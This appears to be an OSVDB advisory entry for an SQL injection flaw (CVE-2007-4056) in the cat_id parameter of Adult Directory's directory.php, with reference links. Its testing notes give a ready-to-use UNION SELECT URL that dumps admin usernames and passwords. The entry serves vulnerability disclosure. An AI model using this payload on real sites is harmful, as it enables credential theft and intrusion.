Adult Directory directory.php cat_id Variable SQL Injection

2007-07-27T00:00:00
ID OSVDB:37267
Type osvdb
Reporter OSVDB
Modified 2007-07-27T00:00:00

Description

Manual Testing Notes

http://[target]/directory.php?ax=list&sub=7&cat_id=-1//UNION//ALL//SELECT//1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13//FROM//admin/*

References:

Mail List Post: http://www.attrition.org/pipermail/vim/2007-July/001728.html
ISS X-Force ID: 35683
Generic Exploit URL: http://www.milw0rm.com/exploits/4238
FrSIRT Advisory: ADV-2007-2695
CVE-2007-4056
Bugtraq ID: 25135